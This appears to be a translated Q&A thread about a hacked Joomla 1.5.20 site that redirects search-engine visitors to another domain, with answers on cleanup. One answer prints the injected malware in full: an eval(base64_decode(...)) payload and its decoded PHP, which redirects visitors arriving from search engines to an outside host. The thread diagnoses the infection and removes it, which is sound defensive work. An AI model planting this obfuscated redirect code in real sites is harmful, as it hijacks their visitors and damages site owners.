2

今日、私のウェブサイトをチェックしているときに、この問題が見つかりました。

問題の詳細は次のとおりです。

ウェブサイトを Google で検索すると、いつものように Google の結果ページに表示されます。

しかし、検索結果で自分のウェブサイトへのリンクをクリックすると、リダイレクトするのに時間がかかり、処理後にランダムな URL にリダイレクトされます (別のドメインにある)。

また、直接アクセスしようとすると、ブラウザから直接アドレスを入力するとうまく動作します。

この Web サイトは Joomla バージョン 1.5.20 を実行しています。

私はすでにこの問題を検索しました.Webを検索した後に得たものを共有しています.

  1. すべてのフォーラムで、これはハッカーまたはウイルスの攻撃によって感染したと書かれています。

  2. すべてのフォーラムは、唯一の解決策は Joomla を再インストールすることだと述べています。

  3. Joomla と WordPress の Web サイトのみが影響を受けます。

  4. この脅威は、PHP コードのどこかに存在します。

  5. 今後、テンプレート、アドオンなどの更新を使用しないようにします。

これが私の研究のすべてです。再インストールせずにこれを解決する方法と、将来これを防ぐためのヒントを知っている人はいますか?

4

4 に答える 4

8

最終的に締め切り前に問題を解決しました。詳細は次のとおりです。

まず、脅威の内容は次のとおりです。

私のサイトのすべてのファイルで見つけた単純な Base64 でエンコードされた PHP スクリプトです。

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGluaWEuenlucy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));

これは base64 でエンコードされたコードです。これは、この文字列をデコードした後に実行される PHP の実際のコードです。

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://hinia.zyns.com/");
exit();
}
}
}
}
}

コードからわかるように、これは検索エンジンのみを対象としているため、これが脅威であることは明らかです。

さて、私のウェブサイトを通して、これがどれくらい繰り返されるか推測できますか???

信じられないかもしれませんが、約10,000回繰り返され、モジュール、プラグイン、管理者、ライブラリなど、すべてのファイルを並べ替えて、あらゆる場所で取得しました。

したがって、私のウェブサイトを再び機能させるには、すべての行を削除する必要がありました.

于 2012-06-22T19:46:56.697 に答える
2

Try to disable plugins, here is a tutorial: http://www.ostraining.com/blog/joomla/disable-a-joomla-plugin/ if it will works, you will be able to identify which plugin is infected.

于 2012-06-22T12:24:38.577 に答える